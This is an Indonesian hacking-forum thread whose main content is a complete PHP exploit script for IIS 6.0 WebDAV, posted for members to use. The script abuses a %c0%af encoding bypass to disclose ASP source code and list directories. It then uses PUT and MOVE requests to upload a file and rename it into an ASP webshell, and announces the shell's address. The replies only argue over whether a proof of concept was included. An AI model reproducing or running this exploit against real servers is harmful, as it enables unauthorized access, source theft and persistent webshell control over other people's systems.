[shared] IIS/6.0 server exploit PHP

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

[shared] IIS/6.0 server exploit PHP

Post by wiLMaR_kiDz » Mon Nov 16, 2009 9:18 pm

:kaca: :kaca: :kaca: :kaca: :kaca:
CODE
<?

print_r('
******** IIS 6 WEBDAV Exploit.By [email protected] && Securiteweb.org ********

Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source http://www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path http://www.tian6.com /secret/
Example3: php '.$argv[0].' put http://www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');

//verification du debut
if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}
else {$action=$argv[1];}

if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}
else{$host=$argv[2];}

if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}
else{$path=$argv[3];}


//sent
function sent($sock)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$sock);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

if($action=="source"){
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af/",$position,1);
$sock="GET ".$path." HTTP/1.1\r\n";
$sock.="Translate: f\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n\r\n";
sent($sock);
echo $html;
die;
}


if($action=="path"){
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PROPFIND ".$path." HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
$sock.="Content-Length: 0\r\n\r\n";
$sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbo ... D:propfind>';
sent($sock);
$bur=explode("<a:href>",$html);
foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";}
echo $resultat;
die;
}


if($action=="put"){
echo "Remember,keep urfile in type txt!\r\n\r\n";
$fp = fopen("test.txt", 'r');
if($fp!=false){
while (false!==($char = fgets($fp))) {
$fir1 .= $char; # fix: hoahongtim Team: hvaonline.net
}
fclose($fp);
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PUT ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
$sock.="Connection:close\r\n";
$sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";
$sock.="".$fir1."\r\n";
echo $sock; sent($sock);sleep(2);
$sock="MOVE ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
$sock.="Destination: ".$path."racle.asp\n\n";
sent($sock);
echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
die;}
else{die;}
}
:omg: :omg: :omg: :omg: :omg:
regards,
ordinary user,-

User avatar
franky_muchtar
Posts: 30
Joined: Sun May 04, 2008 11:17 pm

Re: [shared] IIS/6.0 server exploit PHP

Post by franky_muchtar » Sun Jan 24, 2010 9:23 pm

Forum rules said that "Sertakan POC disini agar member dapat mempelajarinya" so, Where is POC?

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: [shared] IIS/6.0 server exploit PHP

Post by wiLMaR_kiDz » Mon Jan 25, 2010 12:56 am

ngelih wrote:Forum rules said that "Sertakan POC disini agar member dapat mempelajarinya" so, Where is POC?
Lah,forum rules d bikin kapan,thread neh d bkin kapan om??.prasaan ane c, thrid ne duluan..
:ngakak: :ngakak:
coba di perhatikan baik2,di atas juga udah d sertakan POC ny....
Kan tgl di upload aja k webserver..Truz yg dibawah, itu smua code exploitnya....


Trims-
regards,
ordinary user,-

Post Reply

Return to “Web Hacking”